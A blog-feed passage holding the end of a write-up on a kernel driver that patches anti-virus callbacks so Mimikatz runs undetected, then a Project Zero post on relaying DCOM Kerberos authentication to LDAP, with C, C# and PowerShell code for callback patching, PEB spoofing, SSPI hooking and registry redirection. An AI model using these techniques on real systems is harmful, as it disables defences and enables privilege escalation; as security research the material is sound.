Once the driver was compiled and signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

bsod

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

PsSetCreateProcessNotifyRoutine

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

PspSetCreateProcessNotifyRoutine

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and
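
To make the masking concrete, a quick sketch (the entry value is hypothetical; the low bits of each callback array entry are flag bits that must be cleared to recover the pointer to the callback structure):

entry = 0xFFFF8D0B2D5F4B4F  # hypothetical value read from the callback array
callback_struct = entry & 0xFFFFFFFFFFFFFFF8  # clear the low flag bits
print(hex(callback_struct))  # 0xffff8d0b2d5f4b48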

The driver roughly follows the same method to locate the callback array in memory: it calculates offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which it obtains using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop through the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for the 0xE8 OPCODE, which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the absolute address of the callback array (LEA target = next-instruction address + displacement)
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where the OPCODE_* arrays are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumber).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3-byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Windows Exploitation Tricks: Relaying DCOM Authentication

20 October 2021 at 16:38
By: Ryan

Posted by James Forshaw, Project Zero

In my previous blog post I discussed the possibility of relaying Kerberos authentication from a DCOM connection. I was originally going to provide a more in-depth explanation of how that works, but as it's quite involved I thought it was worthy of its own blog post. This is primarily a technique to get relay authentication from another user on the same machine and forward that to a network service such as LDAP. You could use this to escalate privileges on a host using a technique similar to a blog post from Shenanigans Labs but removing the requirement for the WebDAV service. Let's get straight to it.

Background

The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits, the latest in that line being RemotePotato which is currently unpatched as of October 2021.

The key feature that the exploit abused is standard COM marshaling. Specifically when a COM object is marshaled so that it can be used by a different process or host, the COM runtime generates an OBJREF structure, most commonly the OBJREF_STANDARD form. This structure contains all the information necessary to establish a connection between a COM client and the original object in the COM server.

Connecting to the original object from the OBJREF is a two part process:

  1. The client extracts the Object Exporter ID (OXID) from the structure and contacts the OXID resolver service specified by the RPC binding information in the OBJREF.
  2. The client uses the OXID resolver service to find the RPC binding information of the COM server which hosts the object and establishes a connection to the RPC endpoint to access the object's interfaces.

Both of these steps require establishing an MSRPC connection to an endpoint. Commonly this is either locally over ALPC, or remotely via TCP. If a TCP connection is used then the client will also authenticate to the RPC server using NTLM or Kerberos based on the security bindings in the OBJREF.

The first key insight I had for issue 325 is that you can construct an OBJREF which will always establish a connection to the OXID resolver service over TCP, even if the service was on the local machine. To do this you specify the hostname as an IP address and an arbitrary TCP port for the client to connect to. This allows you to listen locally and when the RPC connection is made the authentication can be relayed or repurposed.

This isn't yet a privilege escalation, since you need to convince a privileged user to unmarshal the OBJREF. This was the second key insight: you could get a privileged service to unmarshal an arbitrary OBJREF easily using the CoGetInstanceFromIStorage API and activating a privileged COM service. This marshals a COM object, creates the privileged COM server and then unmarshals the object in the server's security context. This results in an RPC call to the fake OXID resolver authenticated using a privileged user's credentials. From there the authentication could be relayed to the local system for privilege escalation.

Diagram of a DCOM authentication relay attack from issue 325

Being able to redirect the OXID resolver RPC connection locally to a different TCP port was not by design and Microsoft eventually fixed this in Windows 10 1809/Server 2019. The underlying issue prior to Windows 10 1809 was the string containing the host returned as part of the OBJREF was directly concatenated into an RPC string binding. Normally the RPC string binding should have been in the form of:

ncacn_ip_tcp:ADDRESS[135]

Where ncacn_ip_tcp is the protocol sequence for RPC over TCP, ADDRESS is the target address which would come from the string binding, and [135] is the well-known TCP port for the OXID resolver appended by RPCSS. However, as the ADDRESS value is inserted manually into the binding, the OBJREF could specify its own port, resulting in the string binding:

ncacn_ip_tcp:ADDRESS[9999][135]

The RPC runtime would just pick the first port in the binding string to connect to, in this case 9999, and would ignore the second port 135. This behavior was fixed by calling the RpcStringBindingCompose API which will correctly escape the additional port number which ensures it's ignored when making the RPC connection.

This is where the RemotePotato exploit, developed by Antonio Cocomazzi and Andrea Pierini, comes into the picture. While it was no longer possible to redirect the OXID resolving to a local TCP server, you could redirect the initial connection to an external server. A call is made to the IObjectExporter::ResolveOxid2 method which can return an arbitrary RPC binding string for a fake COM object.

Unlike the OXID resolver binding string, the one for the COM object is allowed to contain an arbitrary TCP port. By returning a binding string for the original host on an arbitrary TCP port, the second part of the connection process can be relayed rather than the first. The relayed authentication can then be sent to a domain server, such as LDAP or SMB, as long as they don't enforce signing.

Diagram of a DCOM authentication relay attack from RemotePotato

This exploit has the clear disadvantage of requiring an external machine to act as the target of the initial OXID resolving. While investigating the Kerberos authentication relay attacks for DCOM, could I find a way to do everything on the same machine?

Remote ➜ Local Potato

If we're relaying the authentication for the second RPC connection, could we get the local OXID resolver to do the work for us and resolve to a local COM server on a randomly selected port? One of my goals is to write the least amount of code, which is why we'll do everything in C# and .NET.

byte[] ba = GetMarshalledObject(new object());
var std = COMObjRefStandard.FromArray(ba);

Console.WriteLine("IPID: {0}", std.Ipid);
Console.WriteLine("OXID: {0:X08}", std.Oxid);
Console.WriteLine("OID : {0:X08}", std.Oid);

std.StringBindings.Clear();
std.StringBindings.Add(RpcTowerId.Tcp, "127.0.0.1");

Console.WriteLine("objref:{0}:", Convert.ToBase64String(std.ToArray()));

This code creates a basic .NET object and COM marshals it to a standard OBJREF. I've left out the code for the marshalling and parsing of the OBJREF, but much of that is already present in the linked issue 325. We then modify the list of string bindings to only include a TCP binding for 127.0.0.1, forcing the OXID resolver to use TCP. If you specify a computer's hostname then the OXID resolver will use ALPC instead. Note that the string bindings in the OBJREF are only for binding to the OXID resolver, not the COM server itself.

We can then convert the modified OBJREF into an objref moniker. This format is useful as it allows us to trivially unmarshal the object in another process by calling the Marshal::BindToMoniker API in .NET and passing the moniker string. For example to bind to the COM object in PowerShell you can run the following command:

[Runtime.InteropServices.Marshal]::BindToMoniker("objref:TUVP...:")

Immediately after binding to the moniker a firewall dialog is likely to appear as shown:

Firewall dialog for the COM server when a TCP binding is created

This is requesting the user to allow our COM server process access to listen on all network interfaces for incoming connections. This prompt only appears when the client tries to resolve the OXID as DCOM supports dynamic RPC endpoints. Initially when the COM server starts it only listens on ALPC, but the RPCSS service can ask the server to bind to additional endpoints.

This request is made through an internal RPC interface that every COM server implements for use by the RPCSS service. One of the functions on this interface is UseProtSeq, which requests that the COM server enables a TCP endpoint. When the COM server receives the UseProtSeq call it tries to bind a TCP server to all interfaces, which subsequently triggers the Windows Defender Firewall to prompt the user for access.

Enabling the firewall permission requires administrator privileges. However, as we only need to listen for connections via localhost we shouldn't need to modify the firewall so the dialog can be dismissed safely. However, going back to the COM client we'll see an error reported.

Exception calling "BindToMoniker" with "1" argument(s):
"The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)"

If we allow our COM server executable through the firewall, the client is able to connect over TCP successfully. Clearly the firewall is affecting the behavior of the COM client in some way even though it shouldn't. Tracing through the unmarshalling process in the COM client, the error is being returned from RPCSS when trying to resolve the OXID's binding information. This would imply that no connection attempt is made, and RPCSS is detecting that the COM server wouldn't be allowed through the firewall and refusing to return any binding information for TCP.

Further digging into RPCSS led me to the following function:

BOOL IsPortOpen(LPWSTR ImageFileName, int PortNumber) {
  INetFwMgr* mgr;

  CoCreateInstance(CLSID_FwMgr, NULL, CLSCTX_INPROC_SERVER,
                   IID_PPV_ARGS(&mgr));
  VARIANT Allowed;
  VARIANT Restricted;
  mgr->IsPortAllowed(ImageFileName, NET_FW_IP_VERSION_ANY,
             PortNumber, NULL, NET_FW_IP_PROTOCOL_TCP,
             &Allowed, &Restricted);
  if (VT_BOOL != Allowed.vt)
    return FALSE;
  return Allowed.boolVal == VARIANT_TRUE;
}

This function uses the HNetCfg.FwMgr COM object, and calls INetFwMgr::IsPortAllowed to determine if the process is allowed to listen on the specified TCP port. This function is called for every TCP binding when enumerating the COM server's bindings to return to the client. RPCSS passes the full path to the COM server's executable and the listening TCP port. If the function returns FALSE then RPCSS doesn't consider it valid and won't add it to the list of potential bindings.

If the OXID resolving process doesn't have any binding at the end of the lookup process it will return the RPC_S_SERVER_UNAVAILABLE error and the COM client will fail to bind to the server. How can we get around this limitation without needing administrator privileges to allow our server through the firewall? We can convert this C++ code into a small PowerShell function to test the behavior of the function to see what would grant access.

function Test-IsPortOpen {
    param(
        [string]$Name,
        [int]$Port
    )
    $mgr = New-Object -ComObject "HNetCfg.FwMgr"
    $allow = $null
    $mgr.IsPortAllowed($Name, 2, $Port, "", 6, [ref]$allow, $null)
    $allow
}

foreach($f in $(ls "$env:WINDIR\system32\*.exe")) {
    if (Test-IsPortOpen $f.FullName 12345) {
        Write-Host $f.FullName
    }
}

This script enumerates all executable files in system32 and checks if they'd be allowed to connect to TCP port 12345. Normally the TCP port would be selected automatically, however the COM server can use the RpcServerUseProtseqEp API to pre-register a known TCP port for RPC communication, so we'll just pick port 12345.

The only executable in system32 that returns true from Test-IsPortOpen is svchost.exe. That makes some sense, the default firewall rules usually permit a limited number of services to be accessible through the firewall, the majority of which are hosted in a shared service process.

This check doesn't guarantee a COM server will be allowed through the firewall, just that it's potentially accessible in order to return a TCP binding string. As the connection will be via localhost we don't need to be allowed through the firewall, only that IsPortOpen thinks we could be open. How can we spoof the image filename?

The obvious trick would be to create a svchost.exe process and inject our own code into it. However, that is harder to achieve through pure .NET code, and injecting into an svchost executable is a bit of a red flag if something is monitoring for malicious code, which might make the exploit unreliable. Instead, perhaps we can influence the image filename used by RPCSS?

Digging into the COM runtime, when a COM server registers itself with RPCSS it passes its own image filename as part of the registration information. The runtime gets the image filename through a call to GetModuleFileName, which gets the value from the ImagePathName field in the process parameters block referenced by the PEB.

We can modify this string in our own process to be anything we like, then when COM is initialized, that will be sent to RPCSS which will use it for the firewall check. Once the check passes, RPCSS will return the TCP string bindings for our COM server when unmarshalling the OBJREF and the client will be able to connect. This can all be done with only minor in-process modifications from .NET and no external servers required.
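
The exploit snippet in the next section calls a SetProcessModuleName helper to perform this swap. A minimal sketch of how such a helper could be implemented is shown below. Note this is my own reconstruction, it assumes a 64-bit process (the 0x20 and 0x60 structure offsets are x64-specific) and it skips error handling.

using System;
using System.Runtime.InteropServices;

static class PebHelper
{
    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_BASIC_INFORMATION
    {
        public IntPtr ExitStatus;
        public IntPtr PebBaseAddress;
        public IntPtr AffinityMask;
        public IntPtr BasePriority;
        public IntPtr UniqueProcessId;
        public IntPtr InheritedFromUniqueProcessId;
    }

    [DllImport("ntdll.dll")]
    static extern int NtQueryInformationProcess(IntPtr ProcessHandle,
        int ProcessInformationClass, ref PROCESS_BASIC_INFORMATION Info,
        int InfoLength, out int ReturnLength);

    // Rewrite the ImagePathName UNICODE_STRING in our own process
    // parameters and return the old value so it can be restored.
    public static string SetProcessModuleName(string name)
    {
        var pbi = new PROCESS_BASIC_INFORMATION();
        // 0 == ProcessBasicInformation, -1 == current process pseudo handle.
        NtQueryInformationProcess(new IntPtr(-1), 0, ref pbi,
            Marshal.SizeOf(pbi), out _);
        // PEB.ProcessParameters is at offset 0x20 on x64.
        IntPtr procParams = Marshal.ReadIntPtr(pbi.PebBaseAddress, 0x20);
        // RTL_USER_PROCESS_PARAMETERS.ImagePathName is at offset 0x60 on x64.
        IntPtr imagePath = procParams + 0x60;
        short oldLen = Marshal.ReadInt16(imagePath, 0);
        IntPtr oldBuf = Marshal.ReadIntPtr(imagePath, 8);
        string oldName = Marshal.PtrToStringUni(oldBuf, oldLen / 2);
        // Point the UNICODE_STRING at a new (deliberately leaked) buffer.
        Marshal.WriteIntPtr(imagePath, 8, Marshal.StringToHGlobalUni(name));
        Marshal.WriteInt16(imagePath, 0, (short)(name.Length * 2));
        Marshal.WriteInt16(imagePath, 2, (short)((name.Length + 1) * 2));
        return oldName;
    }
}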

Capturing Authentication

At this point a new RPC connection will be made to our process to communicate with the marshaled COM object. During that process the COM client must authenticate, so we can capture and relay that authentication to another service locally or remotely. What's the best way to capture that authentication traffic?

Before we do anything we need to select what authentication we want to receive, and this will be reflected in the OBJREF's security bindings. As we're doing everything using the existing COM runtime we can register what RPC authentication services to use when calling CoInitializeSecurity in the COM server through the asAuthSvc parameter.

var svcs = new SOLE_AUTHENTICATION_SERVICE[] {
    new SOLE_AUTHENTICATION_SERVICE() {
        dwAuthnSvc = RpcAuthenticationType.Kerberos,
        pPrincipalName = "HOST/DC.domain.com"
    }
};

var str = SetProcessModuleName("System");
try
{
    CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,
        IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,
        ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,
        EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,
        IntPtr.Zero);
}
finally
{
    SetProcessModuleName(str);
}

In the above code, we register to only receive Kerberos authentication and we can also specify an arbitrary SPN as I described in the previous blog post. One thing to note is that the call to CoInitializeSecurity will establish the connection to RPCSS and pass the executable filename. Therefore we need to modify the filename before calling the API as we can't change it after the connection has been established.

For swag points I specify the filename System rather than build the full path to svchost.exe. This is the name assigned to the kernel which is also granted access through the firewall. We restore the original filename after the call to CoInitializeSecurity to reduce the risk of it breaking something unexpectedly.

That covers the selection of the authentication service to use, but doesn't help us actually capture that authentication. My first thought to capture the authentication was to find the socket handle for the TCP server, close it and create a new socket in its place. Then I could directly process the RPC protocol and parse out the authentication. This felt somewhat risky as the RPC runtime would still think it has a valid TCP server socket and might fail in unexpected ways. Also it felt like a lot of work, when I have a perfectly good RPC protocol parser built into Windows.

I then resigned myself to hooking the SSPI APIs, although ideally I'd prefer not to do so. However, once I started looking at the RPC runtime library there weren't any imports for the SSPI APIs to hook into and I really didn't want to patch the functions themselves. It turns out that the RPC runtime loads security packages dynamically, based on the authentication service requested and the configuration of the HKLM\SOFTWARE\Microsoft\Rpc\SecurityService registry key.

Screenshot of the Registry Editor showing HKLM\SOFTWARE\Microsoft\Rpc\SecurityService key

The key, shown in the above screenshot, has a list of values. Each value's name is the number assigned to the authentication service, for example 16 is RPC_C_AUTHN_GSS_KERBEROS. The value's data is then the name of the DLL to load which provides the API; for Kerberos this is sspicli.dll.

The RPC runtime then loads a table of security functions from the DLL by calling its exported InitSecurityInterface method. At least for sspicli the table is always the same and is a pre-initialized structure in the DLL's data section. This is perfect: we can just call InitSecurityInterface before the RPC runtime is initialized to get a pointer to the table, then modify its function pointers to point to our own implementation of the API. As an added bonus the table is in a writable section of the DLL, so we don't even need to modify the memory protection.
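
A rough sketch of the hooking approach is shown below. This is my own illustration, not the exploit's code: it assumes the x64 layout of the security function table (pointers starting at offset 8 after dwVersion, with AcceptSecurityContext as the seventh entry) and it must run before the RPC runtime is initialized.

using System;
using System.Runtime.InteropServices;

static class SspiHook
{
    [DllImport("sspicli.dll")]
    static extern IntPtr InitSecurityInterfaceW();

    // Signature approximating AcceptSecurityContext; raw pointers are
    // good enough to pass the arguments through unchanged.
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    delegate int AcceptSecurityContextFn(IntPtr phCredential, IntPtr phContext,
        IntPtr pInput, int fContextReq, int TargetDataRep, IntPtr phNewContext,
        IntPtr pOutput, out int pfContextAttr, IntPtr ptsExpiry);

    static AcceptSecurityContextFn _original;
    // Keep a reference to the hook delegate so the GC doesn't collect it.
    static readonly AcceptSecurityContextFn _hook = HookAcceptSecurityContext;

    static int HookAcceptSecurityContext(IntPtr phCredential, IntPtr phContext,
        IntPtr pInput, int fContextReq, int TargetDataRep, IntPtr phNewContext,
        IntPtr pOutput, out int pfContextAttr, IntPtr ptsExpiry)
    {
        // Inspect or copy the client's token from pInput here, then call
        // the real implementation to keep the RPC server happy.
        Console.WriteLine("AcceptSecurityContext called.");
        return _original(phCredential, phContext, pInput, fContextReq,
            TargetDataRep, phNewContext, pOutput, out pfContextAttr, ptsExpiry);
    }

    // Must be called before the RPC runtime is initialized.
    public static void Install()
    {
        IntPtr table = InitSecurityInterfaceW();
        // On x64 the function pointers start at offset 8 after dwVersion;
        // AcceptSecurityContext is the 7th pointer in the table.
        IntPtr slot = table + 8 + 6 * IntPtr.Size;
        _original = Marshal.GetDelegateForFunctionPointer<AcceptSecurityContextFn>(
            Marshal.ReadIntPtr(slot));
        // The table is in a writable data section so no VirtualProtect is needed.
        Marshal.WriteIntPtr(slot, Marshal.GetFunctionPointerForDelegate(_hook));
    }
}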

Of course implementing the hooks is non-trivial. This is made more complex because RPC uses the DCE style Kerberos authentication which requires two tokens from the client before the server considers the authentication complete. This requires maintaining more state to keep the RPC server and client implementations happy. I'll leave this as an exercise for the reader.

Choosing a Relay Target Service

The next step is to choose a suitable target service to relay the authentication to. For issue 325 I relayed the authentication to the same machine's DCOM activator RPC service and was able to achieve an arbitrary file write.

I thought that maybe I could do so again, so I modified my .NET RPC client to handle the relayed authentication and tried accessing local RPC services. No matter what RPC server or function I called, I always got an access denied error. Even if I wrote my own RPC server which didn't have any checks, it would fail.

Digging into the failure it turned out that at some point (I don't know specifically when), Microsoft added a mitigation into the RPC runtime to make it very difficult to relay authentication back to the same system.

void SSECURITY_CONTEXT::ValidateUpgradeCriteria() {
  if (this->AuthnLevel < RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) {
    if (IsLoopback())
      this->UnsafeLoopbackAuth = TRUE;
  }
}

The SSECURITY_CONTEXT::ValidateUpgradeCriteria method is called when receiving RPC authentication packets. If the authentication level for the RPC connection is less than RPC_C_AUTHN_LEVEL_PKT_INTEGRITY such as RPC_C_AUTHN_LEVEL_PKT_CONNECT and the authentication was from the same system then a flag is set to true in the security context. The IsLoopback function calls the QueryContextAttributes API for the undocumented SECPKG_ATTR_IS_LOOPBACK attribute value from the server security context. This attribute indicates if the authentication was from the local system.

When an RPC call is made the server will check if the flag is true; if it is, the call will be immediately rejected before any code is called in the server, including the RPC interface's security callback. The only way to pass this check is if either the authentication doesn't come from the local system or the authentication level is RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above, which then requires the client to know the session key for signing or encryption. The RPC client will also check for local authentication and will increase the authentication level if necessary. This is an effective way of preventing the relay of local authentication to elevate privileges.

Instead, as I was focussing on Kerberos, I came to the conclusion that relaying the authentication to an enterprise network service was more useful. As the default settings for a domain controller's LDAP service still do not enforce signing, it seemed a reasonable target. As we'll see, this places a limitation on the source of the authentication: it must not enable Integrity, otherwise the LDAP server will enforce signing.

The problem with LDAP is I didn't have any code which implemented the protocol. I'm sure there is some .NET code to do it somewhere, but the fewer dependencies I have the better. As I mentioned in the previous blog post, Windows has a builtin LDAP library in wldap32.dll. Could I repurpose its API to use relayed authentication instead?

Unsurprisingly the library doesn't have an "Enable relayed authentication" mode, but after a few minutes in a disassembler it was clear it was also delay-loading the SSPI interfaces through the InitSecurityInterface method, so I could repurpose my authentication capture code to perform the relay. There was one minor issue: accidentally or on purpose there was a stray call to QueryContextAttributes which was directly imported, so I needed to patch that through an Import Address Table (IAT) hook, as distasteful as that was.

There was still a problem however. When the client connects it always tries to enable LDAP signing; as we are relaying authentication with no access to the session key, this causes the connection to fail. Setting the option value LDAP_OPT_SIGN in the library to false didn't change this behavior. I needed to set the LdapClientIntegrity registry value to 0 in the LDAP service's key before initializing the library. Unfortunately that key is only modifiable by administrators. I could have modified the library itself, but as it checks the key during DllMain it would be a complex dance to patch the DLL in the middle of loading.

Instead I decided to override the HKEY_LOCAL_MACHINE key. This is possible for the Win32 APIs by using the RegOverridePredefKey API. The purpose of the API is to allow installers to redirect administrator-only modifications to the registry into a writable location, however for our purposes we can also use it to redirect the reading of the LdapClientIntegrity registry value.

[DllImport("Advapi32.dll")]

static extern int RegOverridePredefKey(

    IntPtr hKey,

    IntPtr hNewHKey

);

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]

static extern IntPtr LoadLibrary(string libname);

static readonly IntPtr HKEY_LOCAL_MACHINE = new IntPtr(-2147483646);

static void OverrideLocalMachine(RegistryKey key)

{

    int res = RegOverridePredefKey(HKEY_LOCAL_MACHINE,

        key?.Handle.DangerousGetHandle() ?? IntPtr.Zero);

    if (res != 0)

        throw new Win32Exception(res);

}

static void LoadLDAPLibrary()

{

    string dummy = @"SOFTWARE\DUMMY";

    string target = @"System\CurrentControlSet\Services\LDAP";

    using (var key = Registry.CurrentUser.CreateSubKey(dummy, true))

    {

        using (var okey = key.CreateSubKey(target, true))

        {

            okey.SetValue("LdapClientIntegrity", 0,

                          RegistryValueKind.DWord);

            OverrideLocalMachine(key);

            try

            {

                IntPtr lib = LoadLibrary("wldap32.dll");

                if (lib == IntPtr.Zero)

                    throw new Win32Exception();

            }

            finally

            {

                OverrideLocalMachine(null);

                Registry.CurrentUser.DeleteSubKeyTree(dummy);

            }

        }

    }

}

This code redirects the HKEY_LOCAL_MACHINE key and then loads the LDAP library. Once it's loaded we can then revert the override so that everything else works as expected. We can now repurpose the built-in LDAP library to relay Kerberos authentication to the domain controller. For the final step, we need a privileged COM service to unmarshal the OBJREF to start the process.

Choosing a COM Unmarshaller

The RemotePotato attack assumes that a more privileged user is authenticated on the same machine. However I wanted to see what I could do without that requirement. Realistically the only thing that can be done is to relay the computer's domain account to the LDAP server.

To get access to authentication for the computer account, we need to unmarshal the OBJREF inside a process running as either SYSTEM or NETWORK SERVICE. These local accounts are mapped to the computer account when authenticating to another machine on the network.

We do have one big limitation on the selection of a suitable COM server: it must make the RPC connection using the RPC_C_AUTHN_LEVEL_PKT_CONNECT authentication level. Anything above that will enable Integrity on the authentication which will prevent us relaying to LDAP. Fortunately RPC_C_AUTHN_LEVEL_PKT_CONNECT is the default setting for DCOM, but unfortunately all services which use the svchost process change that default to RPC_C_AUTHN_LEVEL_PKT which enables Integrity.

After a bit of hunting around with OleViewDotNet, I found a good candidate class, CRemoteAppLifetimeManager (CLSID: 0bae55fc-479f-45c2-972e-e951be72c0c1) which is hosted in its own executable, runs as NETWORK SERVICE, and doesn't change any default settings as shown below.

Screenshot of the OleViewDotNet showing the security flags of the CRemoteAppLifetimeManager COM server

The server doesn't change the default impersonation level from RPC_C_IMP_LEVEL_IDENTIFY, which means the negotiated token will only be at SecurityIdentification level. For LDAP, this doesn't matter as it only uses the token for access checking, not to open resources. However, this would prevent using the same authentication to access something like the SMB server. I'm confident that given enough effort, a COM server with both RPC_C_AUTHN_LEVEL_PKT_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE could be found, but it wasn't necessary for my exploit.

Wrapping Up

That's a somewhat complex exploit. However, it does allow for authentication relay of arbitrary Kerberos tokens from a local user to LDAP on a default Windows 10 system. Hopefully it provides some ideas of how to implement something similar without always needing to write your own protocol servers and clients, instead repurposing what's already available.

This exploit is very similar to the existing RemotePotato exploit that Microsoft have already stated will not be fixed. This is because Microsoft considers authentication relay attacks to be an issue with the configuration of the Windows network, such as not enforcing signing on LDAP, rather than the particular technique used to generate the authentication relay. As I mentioned in the previous blog post, at most this would be assessed as a Moderate severity issue which does not reach the bar for fixing as part of regular updates (or potentially, not being fixed at all).

As for mitigating this issue without it being fixed by Microsoft, a system administrator should follow Microsoft's recommendations to enable signing and/or encryption on any sensitive service in the domain, especially LDAP. They can also enable Extended Protection for Authentication where the service is protected by TLS. They can also configure the default DCOM authentication level to be RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above. These changes would make the relay of Kerberos or NTLM authentication significantly less useful.

Using Kerberos for Authentication Relay Attacks

20 October 2021 at 16:26
By: Ryan

Posted by James Forshaw, Project Zero

